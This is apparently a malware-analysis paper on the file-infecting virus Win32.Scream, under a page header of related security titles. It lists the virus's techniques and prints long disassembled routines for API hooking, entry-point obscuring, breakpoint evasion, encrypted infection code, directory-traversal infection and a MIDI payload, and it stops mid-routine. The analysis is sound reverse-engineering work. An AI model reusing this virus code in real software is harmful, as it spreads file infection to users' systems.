Analysis of Win32.Scream

Similar documents

Software Fingerprinting for Automated Malicious Code Analysis

Computer Organization and Assembly Language

Abysssec Research. 1) Advisory information. 2) Vulnerable version

Systems Design & Programming Data Movement Instructions. Intel Assembly

Complete 8086 instruction set

CS412/CS413. Introduction to Compilers Tim Teitelbaum. Lecture 20: Stack Frames 7 March 08

A Tiny Guide to Programming in 32-bit x86 Assembly Language

TitanMist: Your First Step to Reversing Nirvana TitanMist. mist.reversinglabs.com

esrever gnireenigne tfosorcim seiranib

A Museum of API Obfuscation on Win32

Packers Models. simple. malware. advanced. allocation. decryption. decompression. engine loading. integrity check. DRM Management

Packers. (5th April 2010) Ange Albertini Creative Commons Attribution 3.0

Self Protection Techniques in Malware

INTRODUCTION TO MALWARE & MALWARE ANALYSIS

Fighting malware on your own

Hotpatching and the Rise of Third-Party Patches

1. General function and functionality of the malware

Inside a killer IMBot. Wei Ming Khoo University of Cambridge 19 Nov 2010

64-Bit NASM Notes. Invoking 64-Bit NASM

Return-oriented programming without returns

Removing Sentinel SuperPro dongle from Applications and details on dongle way of cracking Shub-Nigurrath of ARTeam Version 1.

Buffer Overflows. Security 2011

Disassembly of False Positives for Microsoft Word under SCRAP

The 80x86 Instruction Set

CS 16: Assembly Language Programming for the IBM PC and Compatibles

How To Use A Computer With A Screen On It (For A Powerbook)

REpsych. : psycholigical warfare in reverse engineering. def con 2015 // domas

Hacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail

Assembly Language: Function Calls" Jennifer Rexford!

Overview of IA-32 assembly programming. Lars Ailo Bongo University of Tromsø

Unpacked BCD Arithmetic. BCD (ASCII) Arithmetic. Where and Why is BCD used? From the SQL Server Manual. Packed BCD, ASCII, Unpacked BCD

Introduction to Reverse Engineering

Introduction. Figure 1 Schema of DarunGrim2

x64 Cheat Sheet Fall 2015

Lecture 7: Machine-Level Programming I: Basics Mohamed Zahran (aka Z)

Spyware Forensic With Reversing and Static Analysis PK TWCERT/CC

CS61: Systems Programing and Machine Organization

Win32.Winux.txt Wed Nov 21 13:30: ; ; : Win32/Linux.Winux : ; ; : by Benny/29A : ;

Heap-based Buffer Overflow Vulnerability in Adobe Flash Player

Reverse Engineering and Computer Security

Abysssec Research. 1) Advisory information. 2) Vulnerable version

COMPUTERS ORGANIZATION 2ND YEAR COMPUTE SCIENCE MANAGEMENT ENGINEERING JOSÉ GARCÍA RODRÍGUEZ JOSÉ ANTONIO SERRA PÉREZ

Application-Specific Attacks: Leveraging the ActionScript Virtual Machine

Attacks on Virtual Machine Emulators

How To Hack The Steam Voip On Pc Orchesterian Moonstone 2.5 (Windows) On Pc/Robert Kruber (Windows 2) On Linux (Windows 3.5) On A Pc

Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code

Windows XP SP3 Registry Handling Buffer Overflow

Title: Bugger The Debugger - Pre Interaction Debugger Code Execution

Reversing C++ Paul Vincent Sabanal. Mark Vincent Yason

Stack Overflows. Mitchell Adair

8. MACROS, Modules, and Mouse

Faculty of Engineering Student Number:

Using Heap Allocation in Intel Assembly Language

Bypassing Anti- Virus Scanners

The Beast is Resting in Your Memory On Return-Oriented Programming Attacks and Mitigation Techniques To appear at USENIX Security & BlackHat USA, 2014

Attacking Obfuscated Code with IDA Pro. Chris Eagle

CHAPTER 6 TASK MANAGEMENT

Assembly Language Tutorial

Bypassing Windows Hardware-enforced Data Execution Prevention

About the Tutorial. Audience. Prerequisites. Copyright & Disclaimer

IOActive Security Advisory

Software Vulnerabilities

Machine Programming II: Instruc8ons

X86-64 Architecture Guide

Character Translation Methods

Hydra. Advanced x86 polymorphic engine. Incorporates existing techniques and introduces new ones in one package. All but one feature OS-independent

Computer Organization and Architecture

Machine-Level Programming II: Arithmetic & Control

Off-by-One exploitation tutorial

Where s the FEEB? The Effectiveness of Instruction Set Randomization

WLSI Windows Local Shellcode Injection. Cesar Cerrudo Argeniss (

OpenBSD Remote Exploit

Windows Assembly Programming Tutorial

風水. Heap Feng Shui in JavaScript. Alexander Sotirov.

How Compilers Work. by Walter Bright. Digital Mars

Harnessing Intelligence from Malware Repositories

Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection

Phoenix Technologies Ltd.

Test Driven Development in Assembler a little story about growing software from nothing

Instruction Set Architecture

An Analysis of the Excel Bug

Embedded x86 Programming: Protected Mode

Violating Database - Enforced Security Mechanisms

White paper: August Marcin Icewall Noga

Anti-RE Techniques in DRM Code

Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques

Syscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES

Identification and Removal of

BCD (ASCII) Arithmetic. Where and Why is BCD used? Packed BCD, ASCII, Unpacked BCD. BCD Adjustment Instructions AAA. Example

PCI BIOS SPECIFICATION. Revision 2.1

MACHINE ARCHITECTURE & LANGUAGE

CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e

Analysis and Diversion of Duqu s Driver

Using MMX Instructions to Convert RGB To YUV Color Conversion

Attacking x86 Windows Binaries by Jump Oriented Programming

Static detection of C++ vtable escape vulnerabilities in binary code

Hacking the Preboot execution Environment

Egil Aspevik Martinsen Polymorphic Viruses. Material from Master Thesis «Detection of Junk Instructions in Malicious Software»

For a 64-bit system. I - Presentation Of The Shellcode

Transcription:

Analysis of Win32.Scream 1. Introduction Scream is a very interesting virus as it combines a lot of techniques written inside of it. In this paper I ll cover all of its features and internals. I ll dissect it from a top bottom approach for better analysis. Moreover, the virus appears to be undetected by all Anti Virus scanners. So, I ll refer to it by the name it was hard coded inside of it (Win32.Scream). Most of the analysis was done with the help of a disassembler (IDA) and some other private tools. 2. Features As I have mentioned before, the virus contains a lot of techniques in which I haven t seen in a virus before. And that s what makes it more interesting. Some of the features of the virus are: API Hooking Engine. Stealth API Calls. Entry Point Obscuring (EPO). Hard Coded Memory Access (HMA). Instruction Length Engine (ILE). Encryption/Decryption Engine (RDKE32). Random Generation Number Engine (MT). Those are just some of the interesting features of the virus but, the list can go. However, for the sake of the moment I just listed some of them. 3. Pre Analysis A non so complex per process resident, entry point obscuring (EPO) virus, which infects PE files. On runtime it launches a thread for directory traversal infection. 3.1. HMA What this engine does is that it remove delta offset for good. It changes all [mem32] with a new mem32 address. But, one have to calculate that address himself and pass it to the engine. The

engine will change all hardcoded memory accesses except if operand, address or FS segment prefix is used. 3.2. ILE What this engine does is that it calculates the instruction length. It Load up ESI with pointer to the instruction one wants to get its size. 3.3. RDKE32 The Random Decoding Key Engine (RKDE32) encrypts and decrypts the virus infection code with SHA 1. 3.4. RNGMT What this engine does is that it generates random numbers based on a matrix linear recurrence over a finite binary field. It provides for fast generation of very high quality pseudorandom numbers, having been designed specifically to rectify many of the flaws found in older algorithms. 4. Analysis CODE:0040468C nop CODE:0040468D mov esi, offset _debug CODE:00404692 mov esi, offset FRD_Imported_Kernel32_API_Names CODE:00404697 mov edi, offset CRC32_Imported_Kernel32_API_Names CODE:0040469C call FRC_MakeCRC32Table CODE:0040469C CODE:004046A1 mov esi, offset FRD_Imported_Imagehlp_API_Names CODE:004046A6 mov edi, offset CRC32_Imported_Imagehlp_API_Names CODE:004046AB call FRC_MakeCRC32Table CODE:004046AB CODE:004046B0 mov esi, offset FRD_Imported_Sfc_API_Names CODE:004046B5 mov edi, offset CRC32_Imported_Sfc_API_Names CODE:004046BA call FRC_MakeCRC32Table CODE:004046BA CODE:004046BF mov esi, offset FRD_Imported_WinMM_API_Names CODE:004046C4 mov edi, offset CRC32_Imported_WinMM_API_Names CODE:004046C9 call FRC_MakeCRC32Table

CODE:004046C9 CODE:004046CE mov esi, offset FRD_Imported_Shell32_API_Names CODE:004046D3 mov edi, offset CRC32_Imported_Shell32_API_Names CODE:004046D8 call FRC_MakeCRC32Table CODE:004046D8 CODE:004046DD mov esi, offset FRD_Hook_API_Names ; "CreateFileA" CODE:004046E2 mov edi, offset API_Hook_Table CODE:004046E2 CODE:004046E7 CODE:004046E7 @@HookAPICRC32Loop: CODE:004046E7 mov al, [esi] CODE:004046E9 test al, al CODE:004046EB jz short @@DoneAPIHookCRC32Loop CODE:004046EB CODE:004046ED call GetCRC32OfString CODE:004046ED CODE:004046F2 mov [edi], ebx CODE:004046F4 add edi, 0Ch CODE:004046F7 jmp short @@HookAPICRC32Loop CODE:004046F7 CODE:004046F9 CODE:004046F9 CODE:004046F9 @@DoneAPIHookCRC32Loop: CODE:004046F9 mov esi, offset FRD_File_Names CODE:004046FE mov edi, offset CRC32_KERNEL32_DLL CODE:00404703 call FRC_MakeCRC32Table CODE:00404703 CODE:00404708 push offset FRC_FakeHost CODE:0040470D mov ER_CallingOffset, offset FRC_FakeHost CODE:00404717 mov ER_Code, 90909090h CODE:00404721 mov ER_Code_0, 90h CODE:00404728 jmp EntryPoint Before the virus runs it needs to do some pre work to setup its surroundings. First, it makes CRC32 Checksums for some API s to use later. And then it setup a fake EPO. After that it jumps to the real starting point for the virus. CODE:00401000 EntryPoint: CODE:00401000 CODE:00401000 pushf CODE:00401001 pusha CODE:00401002 cmp ThreadHandle, 0 CODE:00401009 jz short @@ThreadIsNotRunning CODE:00401009 CODE:0040100B mov ecx, 24h CODE:00401010 call RestoreEPOBytes CODE:00401010 CODE:00401015 popa CODE:00401016 popf

CODE:00401017 retn CODE:00401017 CODE:00401018 CODE:00401018 CODE:00401018 @@ThreadIsNotRunning: CODE:00401018 call Initialize CODE:00401018 CODE:0040101D test eax, eax CODE:0040101F jz short @@RestoreEPO CODE:0040101F CODE:00401021 lea ebx, sub_4010ba CODE:00401027 mov [ebp+0c4h], ebx CODE:0040102D lea ebx, @@ExpSafeLocation CODE:00401033 mov [ebp+0c8h], ebx CODE:00401039 mov [ebp+0cch], esp CODE:0040103F lea ebx, [ebp+0c0h] CODE:00401045 push ebx CODE:00401046 xor ebx, ebx CODE:00401048 push dword ptr fs:[ebx] CODE:0040104B pop dword ptr [ebp+0c0h] CODE:00401051 pop dword ptr fs:[ebx] CODE:00401054 push CRC32_KERNEL32_DLL CODE:0040105A call HookAPIs CODE:0040105A CODE:0040105F push CRC32_SHELL32_DLL CODE:00401065 call HookAPIs CODE:00401065 CODE:0040106A push 0 CODE:0040106C lea eax, MainThread CODE:00401072 push esp CODE:00401073 push 0 CODE:00401075 push 0 CODE:00401077 push eax CODE:00401078 push 0 CODE:0040107A push 0 CODE:0040107C mov al, 1Ah CODE:0040107E call StealthAPI CODE:0040107E CODE:00401083 mov ThreadHandle, eax CODE:00401088 pop ebx CODE:00401089 test eax, eax CODE:0040108B jz short @@RestoreEPO CODE:0040108B CODE:0040108D push 0FFFFFFFEh CODE:0040108F push eax CODE:00401090 mov al, 1Ch CODE:00401092 call StealthAPI CODE:00401092 CODE:00401097 call UnInitialize CODE:00401097 CODE:0040109C CODE:0040109C @@RestoreEPO: CODE:0040109C CODE:0040109C mov ecx, 1024h CODE:004010A1 call RestoreEPOBytes CODE:004010A1 CODE:004010A6

CODE:004010A6 @@ExpSafeLocation: CODE:004010A6 xor ebx, ebx CODE:004010A8 push dword ptr [ebp+0c0h] CODE:004010AE pop dword ptr fs:[ebx] CODE:004010B1 add esp, 1000h CODE:004010B7 popa CODE:004010B8 popf CODE:004010B9 retn This is the real entry point for the virus. What it does is that it saves the registers so that it does not ruin the host s execution. Then it restores the EPO and returns back to the host if the thread was already running. If the thread was not running then it initializes the virus s environment to be able to work. This initialization routine will be discusses later. Also if nothing went wrong during the execution the virus restores the EPO and leaves the routine immediately. Anyways, the virus uses SEH through out the entire virus to avoid crashing under any circumstances. Afterwards, the virus hooks some API s that the hose might be using. Then start a thread that will run simultaneously with the host s code to perform a directory traversal search. Finally the virus cleans up after the changes it has made. And then return back to the host. CODE:004010E1 Initialize proc near CODE:004010E1 CODE:004010E1 CODE:004010E1 arg_0 = dword ptr 4 CODE:004010E1 SFC_BaseAddress = dword ptr 8 CODE:004010E1 WINMM_BaseAddress= dword ptr 0Ch CODE:004010E1 SHELL32_BaseAddress= dword ptr 10h CODE:004010E1 arg_14 = dword ptr 18h CODE:004010E1 arg_8c = dword ptr 90h CODE:004010E1 API_SFC_IN_MSTRUC= dword ptr 9Ch CODE:004010E1 API_WINMM_IN_MSTRUC= dword ptr 0A0h CODE:004010E1 arg_b8 = dword ptr 0BCh CODE:004010E1 arg_cc = dword ptr 0D0h CODE:004010E1 arg_d0 = dword ptr 0D4h CODE:004010E1 arg_d4 = dword ptr 0D8h CODE:004010E1 arg_d8 = dword ptr 0DCh CODE:004010E1 arg_1020 = dword ptr 1024h CODE:004010E1 CODE:004010E1 cmp InitializeState, 0 CODE:004010E8 jnz short Initialize CODE:004010E8 CODE:004010EA or InitializeState, 0FFFFFFFFh CODE:004010F1 pop ebx CODE:004010F2 mov ecx, 1000h CODE:004010F7 sub esp, ecx CODE:004010F9 mov ebp, esp CODE:004010FB mov PointerToMSTRUC, ebp CODE:00401101 cld CODE:00401102 xor eax, eax CODE:00401104 mov edi, esp CODE:00401106 rep stosb CODE:00401108 push ebx CODE:00401109 lea ebx, sub_401269

CODE:0040110F mov [ebp+arg_d0], ebx CODE:00401115 lea ebx, @@ExpSafeLocation CODE:0040111B mov [ebp+arg_d4], ebx CODE:00401121 mov [ebp+arg_d8], esp CODE:00401127 lea ebx, [ebp+arg_cc] CODE:0040112D push ebx CODE:0040112E xor ebx, ebx CODE:00401130 push dword ptr fs:[ebx] CODE:00401133 pop [ebp+arg_cc] CODE:00401139 pop dword ptr fs:[ebx] CODE:0040113C mov eax, [esp+arg_1020] CODE:00401143 rdtsc CODE:00401145 xchg eax, ebx CODE:00401146 xchg eax, edx CODE:00401147 mov ecx, 10h CODE:0040114C div ecx CODE:0040114E lea edi, Init_Key_Start CODE:00401154 xor [edi+edx*4], ebx CODE:00401157 push 10h CODE:00401159 push edi CODE:0040115A call init_by_array CODE:0040115A CODE:0040115F call GetKernel32Base CODE:0040115F CODE:00401164 lea eax, [ebp+arg_14] CODE:00401167 lea ebx, CRC32_Imported_Kernel32_API_Names CODE:0040116D push dword ptr [ebp+0] CODE:00401170 push 1Eh CODE:00401172 push eax CODE:00401173 push ebx CODE:00401174 call GetAPIsFromCRC32List CODE:00401174 CODE:00401179 test eax, eax CODE:0040117B jz @@ExpSafeLocation CODE:0040117B CODE:00401181 lea esi, NAME_IMAGEHLP_DLL CODE:00401187 push esi CODE:00401188 mov al, 3 CODE:0040118A call StealthAPI CODE:0040118A CODE:0040118F test eax, eax CODE:00401191 jz @@ExpSafeLocation CODE:00401191 CODE:00401197 mov [ebp+arg_0], eax CODE:0040119A lea edx, [ebp+arg_8c] CODE:004011A0 lea ebx, CRC32_Imported_Imagehlp_API_Names CODE:004011A6 push eax CODE:004011A7 push 3 CODE:004011A9 push edx CODE:004011AA push ebx CODE:004011AB call GetAPIsFromCRC32List CODE:004011AB CODE:004011B0 test eax, eax CODE:004011B2 jz @@ExpSafeLocation CODE:004011B2 CODE:004011B8 or SFC_enabled, 0FFFFFFFFh CODE:004011BF lea esi, NAME_SFC_DLL

CODE:004011C5 push esi CODE:004011C6 mov al, 3 CODE:004011C8 call StealthAPI CODE:004011C8 CODE:004011CD test eax, eax CODE:004011CF jz short @@NoSFC CODE:004011CF CODE:004011D1 mov [ebp+sfc_baseaddress], eax CODE:004011D4 lea edx, [ebp+api_sfc_in_mstruc] CODE:004011DA lea ebx, CRC32_Imported_Sfc_API_Names CODE:004011E0 push eax CODE:004011E1 push 1 CODE:004011E3 push edx CODE:004011E4 push ebx CODE:004011E5 call GetAPIsFromCRC32List CODE:004011E5 CODE:004011EA test eax, eax CODE:004011EC jz short @@NoSFC CODE:004011EC CODE:004011EE and SFC_enabled, 0 CODE:004011EE CODE:004011F5 CODE:004011F5 @@NoSFC: CODE:004011F5 CODE:004011F5 lea esi, NAME_WINMM_DLL CODE:004011FB push esi CODE:004011FC mov al, 3 CODE:004011FE call StealthAPI CODE:004011FE CODE:00401203 test eax, eax CODE:00401205 jz short @@ExpSafeLocation CODE:00401205 CODE:00401207 mov [ebp+winmm_baseaddress], eax CODE:0040120A lea edx, [ebp+api_winmm_in_mstruc] CODE:00401210 lea ebx, CRC32_Imported_WinMM_API_Names CODE:00401216 push eax CODE:00401217 push 7 CODE:00401219 push edx CODE:0040121A push ebx CODE:0040121B call GetAPIsFromCRC32List CODE:0040121B CODE:00401220 test eax, eax CODE:00401222 jz short @@ExpSafeLocation CODE:00401222 CODE:00401224 lea esi, NAME_SHELL32_DLL CODE:0040122A push esi CODE:0040122B mov al, 3 CODE:0040122D call StealthAPI CODE:0040122D CODE:00401232 test eax, eax CODE:00401234 jz short @@ExpSafeLocation CODE:00401234 CODE:00401236 mov [ebp+shell32_baseaddress], eax CODE:00401239 lea edx, [ebp+arg_b8] CODE:0040123F lea ebx, CRC32_Imported_Shell32_API_Names CODE:00401245 push eax CODE:00401246 push 1

CODE:00401248 push edx CODE:00401249 push ebx CODE:0040124A call GetAPIsFromCRC32List CODE:0040124A CODE:0040124F test eax, eax CODE:00401251 jz short @@ExpSafeLocation CODE:00401251 CODE:00401253 stc CODE:00401254 sbb eax, eax CODE:00401254 CODE:00401256 CODE:00401256 @@ExpSafeLocation: CODE:00401256 CODE:00401256 xor ebx, ebx CODE:00401258 push [ebp+arg_cc] CODE:0040125E pop dword ptr fs:[ebx] CODE:00401261 and InitializeState, 0 CODE:00401268 retn CODE:00401268 Initialize endp In the previous block, the virus initializes it s surrounding to able to work correctly, what it does in brief is that it allocates memory and retrieves memory addresses. CODE:00401290 UnInitialize proc near CODE:00401290 CODE:00401290 push eax CODE:00401291 push dword ptr [ebp+4] CODE:00401294 mov al, 4 CODE:00401296 call StealthAPI CODE:00401296 CODE:0040129B push dword ptr [ebp+8] CODE:0040129E mov al, 4 CODE:004012A0 call StealthAPI CODE:004012A0 CODE:004012A5 push dword ptr [ebp+0ch] CODE:004012A8 mov al, 4 CODE:004012AA call StealthAPI CODE:004012AA CODE:004012AF push dword ptr [ebp+10h] CODE:004012B2 mov al, 4 CODE:004012B4 call StealthAPI CODE:004012B4 CODE:004012B9 pop eax CODE:004012BA retn CODE:004012BA CODE:004012BA UnInitialize endp The previous code block frees up the libraries that the virus has been using through out the code and then return back. CODE:004012BB RestoreEPOBytes proc near CODE:004012BB CODE:004012BB

CODE:004012BB arg_0 = dword ptr 4 CODE:004012BB CODE:004012BB mov ebx, [esp+ecx+arg_0] CODE:004012BF lea edi, [ebx-5] CODE:004012C2 mov [esp+ecx+arg_0], edi CODE:004012C6 mov ecx, 10h CODE:004012CB lea esi, ER_CallingOffset CODE:004012CB CODE:004012D1 CODE:004012D1 @@FindCallerCode: CODE:004012D1 lodsd CODE:004012D2 cmp eax, ebx CODE:004012D4 jz short @@Patch CODE:004012D4 CODE:004012D6 add esi, 5 CODE:004012D9 loop @@FindCallerCode CODE:004012D9 CODE:004012DB CODE:004012DB @@Patch: CODE:004012DB movsb CODE:004012DC movsd CODE:004012DD retn CODE:004012DD CODE:004012DD RestoreEPOBytes endp The previous code block gets the return address on the stack. Since this address points to after the code, it has to make it point to the start of its EPO code. Then it updates the return address on the stack. After that it restores the EPO that called it, searching through the data area to find the one that called the virus. CODE:004012DE MainThread proc near CODE:004012DE CODE:004012DE var_38 = dword ptr -38h CODE:004012DE arg_10e4 = dword ptr 10E8h CODE:004012DE CODE:004012DE pushf CODE:004012DF pusha CODE:004012E0 mov eax, PointerToMSTRUC CODE:004012E5 mov ThreadPointerToMSTRUC, eax CODE:004012EA call Initialize CODE:004012EA CODE:004012EF mov ebx, PointerToMSTRUC CODE:004012F5 xchg ebx, ThreadPointerToMSTRUC CODE:004012FB mov PointerToMSTRUC, ebx CODE:00401301 test eax, eax CODE:00401303 jnz short @@InitializationOK CODE:00401303 CODE:00401305 popa CODE:00401306 popf CODE:00401307 retn CODE:00401307 CODE:00401308 ; ------------------------------------------------------------- -------------- CODE:00401308

CODE:00401308 @@InitializationOK: CODE:00401308 lea ebx, sub_4013fb CODE:0040130E mov [ebp+114h], ebx CODE:00401314 lea ebx, @@ExpSafeLocation CODE:0040131A mov [ebp+118h], ebx CODE:00401320 mov [ebp+11ch], esp CODE:00401326 lea ebx, [ebp+110h] CODE:0040132C push ebx CODE:0040132D xor ebx, ebx CODE:0040132F push dword ptr fs:[ebx] CODE:00401332 pop dword ptr [ebp+110h] CODE:00401338 pop dword ptr fs:[ebx] CODE:0040133B lea esi, word_403f16 CODE:00401341 lea edi, InfectFile CODE:00401341 CODE:00401347 CODE:00401347 _debug: CODE:00401347 nop CODE:00401348 push 698h CODE:0040134D push edi CODE:0040134E push esi CODE:0040134F call RDKE32Decrypt CODE:0040134F CODE:00401354 cmp ThreadExecution, 0FFFFFFFFh CODE:0040135B jz short @@ExpSafeLocation CODE:0040135B CODE:0040135D or Infect_Encrypted, 0FFFFFFFFh CODE:00401364 mov ecx, 104h CODE:00401369 sub esp, ecx CODE:0040136B push esp CODE:0040136C push ecx CODE:0040136D mov al, 0Dh CODE:0040136F call StealthAPI CODE:0040136F CODE:00401374 test eax, eax CODE:00401376 jz short @@ExpSafeLocation CODE:00401376 CODE:00401378 push 5C3A43h CODE:00401378 CODE:0040137D CODE:0040137D @@NextDrive: CODE:0040137D mov eax, 10h CODE:00401382 call RandomNumber CODE:00401382 CODE:00401387 inc eax CODE:00401388 mov [ebp+27ch], eax CODE:0040138E push esp CODE:0040138F mov al, 10h CODE:00401391 call StealthAPI CODE:00401391 CODE:00401396 cmp al, 2 CODE:00401398 jz short @@DriveIsOK CODE:00401398 CODE:0040139A cmp al, 3 CODE:0040139C jz short @@DriveIsOK CODE:0040139C CODE:0040139E cmp al, 4

CODE:004013A0 jnz short @@TryNextDrive CODE:004013A0 CODE:004013A2 CODE:004013A2 @@DriveIsOK: CODE:004013A2 CODE:004013A2 push esp CODE:004013A3 mov al, 0Ch CODE:004013A5 call StealthAPI CODE:004013A5 CODE:004013AA call DirectoryTraversal CODE:004013AA CODE:004013AF cmp ThreadExecution, 0FFFFFFFFh CODE:004013B6 jz short @@RestoreCurrentDirectory CODE:004013B6 CODE:004013B8 CODE:004013B8 @@TryNextDrive: CODE:004013B8 cmp [esp+38h+var_38], '\:Z' CODE:004013BF jz short @@RestoreCurrentDirectory CODE:004013BF CODE:004013C1 inc [esp+38h+var_38] CODE:004013C4 jmp short @@NextDrive CODE:004013C4 CODE:004013C6 CODE:004013C6 CODE:004013C6 @@RestoreCurrentDirectory: CODE:004013C6 CODE:004013C6 pop edx CODE:004013C7 push esp CODE:004013C8 mov al, 0Ch CODE:004013CA call StealthAPI CODE:004013CA CODE:004013CF add esp, 104h CODE:004013CF CODE:004013D5 CODE:004013D5 @@ExpSafeLocation: CODE:004013D5 CODE:004013D5 CODE:004013D5 call UnInitialize CODE:004013D5 CODE:004013DA xor ebx, ebx CODE:004013DC push dword ptr [ebp+110h] CODE:004013E2 pop dword ptr fs:[ebx] CODE:004013E5 mov eax, [ebp+7ch] CODE:004013E8 mov [esp-0cch+arg_10e4], eax CODE:004013EF add esp, 1000h CODE:004013F5 popa CODE:004013F6 popf CODE:004013F7 push 0 CODE:004013F9 call eax CODE:004013F9 CODE:004013F9 MainThread endp The previous code block in brief allocates memory for the virus, retrieves API addresses, and decrypts the infection code and does a directory traversal search.

CODE:00401422 PayloadThread proc near CODE:00401422 CODE:00401422 arg_ff4 = dword ptr 0FF8h CODE:00401422 CODE:00401422 pushf CODE:00401423 pusha CODE:00401424 mov eax, PointerToMSTRUC CODE:00401429 mov Thread2PointerToMSTRUC, eax CODE:0040142E call Initialize CODE:0040142E CODE:00401433 mov ebx, PointerToMSTRUC CODE:00401439 xchg ebx, Thread2PointerToMSTRUC CODE:0040143F mov PointerToMSTRUC, ebx CODE:00401445 test eax, eax CODE:00401447 jnz short @@InitializationOk CODE:00401447 CODE:00401449 popa CODE:0040144A popf CODE:0040144B retn CODE:0040144B CODE:0040144C CODE:0040144C CODE:0040144C @@InitializationOk: CODE:0040144C lea ebx, sub_4014b1 CODE:00401452 mov [ebp+124h], ebx CODE:00401458 lea ebx, @@ExpSafeLocation CODE:0040145E mov [ebp+128h], ebx CODE:00401464 mov [ebp+12ch], esp CODE:0040146A lea ebx, [ebp+120h] CODE:00401470 push ebx CODE:00401471 xor ebx, ebx CODE:00401473 push dword ptr fs:[ebx] CODE:00401476 pop dword ptr [ebp+120h] CODE:0040147C pop dword ptr fs:[ebx] CODE:0040147F lea eax, Payload_Song CODE:00401485 push eax CODE:00401486 call PlayMidiSong CODE:00401486 CODE:0040148B CODE:0040148B @@ExpSafeLocation: CODE:0040148B call UnInitialize CODE:0040148B CODE:00401490 xor ebx, ebx CODE:00401492 push dword ptr [ebp+120h] CODE:00401498 pop dword ptr fs:[ebx] CODE:0040149B mov eax, [ebp+7ch] CODE:0040149E mov [esp+24h+arg_ff4], eax CODE:004014A5 add esp, 1000h CODE:004014AB popa CODE:004014AC popf CODE:004014AD push 0 CODE:004014AF call eax CODE:004014AF CODE:004014AF PayloadThread endp

The previous code block plays a small midi tune as the payload of the virus. CODE:004014D8 StealthAPI proc near CODE:004014D8 CODE:004014D8 CODE:004014D8 var_24 = dword ptr -24h CODE:004014D8 CODE:004014D8 movzx eax, al CODE:004014DB mov eax, [ebp+eax*4+18h] CODE:004014DF pusha CODE:004014E0 push 0Ah CODE:004014E2 xchg eax, esi CODE:004014E2 CODE:004014E3 CODE:004014E3 @@CheckNextInstruction: CODE:004014E3 cmp byte ptr [esi], 0CCh CODE:004014E6 jz short @@BadOpcode CODE:004014E6 CODE:004014E8 cmp word ptr [esi], 0CD03h CODE:004014ED jz short @@BadOpcode CODE:004014ED CODE:004014EF call ILE CODE:004014EF CODE:004014F4 add esi, ecx CODE:004014F6 jecxz short @@JumpToAPI CODE:004014F6 CODE:004014F8 dec [esp+24h+var_24] CODE:004014FB jnz short @@CheckNextInstruction CODE:004014FB CODE:004014FD CODE:004014FD @@JumpToAPI: CODE:004014FD pop eax CODE:004014FE popa CODE:004014FF jmp eax CODE:004014FF CODE:00401501 CODE:00401501 CODE:00401501 @@BadOpcode: CODE:00401501 CODE:00401501 pop eax CODE:00401502 popa CODE:00401503 retn CODE:00401503 CODE:00401503 StealthAPI endp The previous code block contains the StealthAPI function which is one of the most important functions in this virus as it searches for breakpoints in the API code. CODE:00401504 PlayMidiSong proc near CODE:00401504 CODE:00401504 var_38 = dword ptr -38h CODE:00401504 arg_164 = dword ptr 168h CODE:00401504 CODE:00401504 pusha CODE:00401505 mov ecx, 178h

CODE:0040150A sub esp, ecx CODE:0040150C mov edi, esp CODE:0040150E xor eax, eax CODE:00401510 rep stosb CODE:00401512 mov edi, esp CODE:00401514 lea eax, [edi] CODE:00401516 push 0 CODE:00401518 push 0 CODE:0040151A push 0 CODE:0040151C push 0FFFFFFFFh CODE:0040151E push eax CODE:0040151F mov al, 27h CODE:00401521 call StealthAPI CODE:00401521 CODE:00401526 test eax, eax CODE:00401528 jnz @@Error CODE:00401528 CODE:0040152E mov esi, [esp+34h+arg_164] CODE:00401535 lodsd CODE:00401536 xchg eax, ecx CODE:00401537 imul edx, ecx, 10h CODE:0040153A add edx, esi CODE:0040153C xor ebx, ebx CODE:0040153C CODE:0040153E CODE:0040153E @@ProcessDataStreamInformation: CODE:0040153E lodsd CODE:0040153F mov [edi+ebx+10h], eax CODE:00401543 push eax CODE:00401544 lodsd CODE:00401545 xchg eax, [esp+38h+var_38] CODE:00401548 push eax CODE:00401549 add eax, 0B0h CODE:0040154E push 0 CODE:00401550 push 0 CODE:00401552 push eax CODE:00401553 call SendData CODE:00401553 CODE:00401558 pop eax CODE:00401559 add eax, 0C0h CODE:0040155E push 0 CODE:00401560 push [esp+3ch+var_38] CODE:00401564 push eax CODE:00401565 call SendData CODE:00401565 CODE:0040156A pop eax CODE:0040156B lodsd CODE:0040156C mov [edi+ebx+14h], eax CODE:00401570 lodsd CODE:00401571 mov [edi+ebx+18h], eax CODE:00401575 mov [edi+ebx+1ch], edx CODE:00401579 add edx, eax CODE:0040157B add ebx, 18h CODE:0040157E loop @@ProcessDataStreamInformation CODE:0040157E CODE:00401580 and dword ptr [edi+0ch], 0 CODE:00401580

CODE:00401584 CODE:00401584 @@PlaySong: CODE:00401584 and dword ptr [edi+8], 0 CODE:00401588 mov ecx, 0Fh CODE:0040158D xor ebx, ebx CODE:0040158D CODE:0040158F CODE:0040158F @@UpdateLoop: CODE:0040158F mov esi, [edi+ebx+1ch] CODE:00401593 mov edx, [edi+ebx+10h] CODE:00401597 add edx, 90h CODE:0040159D mov eax, [edi+ebx+18h] CODE:004015A1 add eax, [edi+ebx+20h] CODE:004015A5 test eax, eax CODE:004015A7 jz short @@NextTrack CODE:004015A7 CODE:004015A9 or dword ptr [edi+8], 0FFFFFFFFh CODE:004015AD cmp dword ptr [edi+0ch], 0 CODE:004015B1 jz short @@LoadNewNotes CODE:004015B1 CODE:004015B3 dec dword ptr [edi+ebx+20h] CODE:004015B7 jnz short @@NextTrack CODE:004015B7 CODE:004015B9 cmp byte ptr [edi+ebx+24h], 80h CODE:004015BE jz short @@LoadNewNotes CODE:004015BE CODE:004015C0 sub esi, 5 CODE:004015C3 push ecx CODE:004015C4 mov ecx, 5 CODE:004015C9 xor eax, eax CODE:004015C9 CODE:004015CB CODE:004015CB @@StopNoteLoop: CODE:004015CB push 0 CODE:004015CD lodsb CODE:004015CE push eax CODE:004015CF push edx CODE:004015D0 call SendData CODE:004015D0 CODE:004015D5 loop @@StopNoteLoop CODE:004015D5 CODE:004015D7 pop ecx CODE:004015D7 CODE:004015D8 CODE:004015D8 @@LoadNewNotes: CODE:004015D8 CODE:004015D8 mov eax, [edi+ebx+18h] CODE:004015DC test 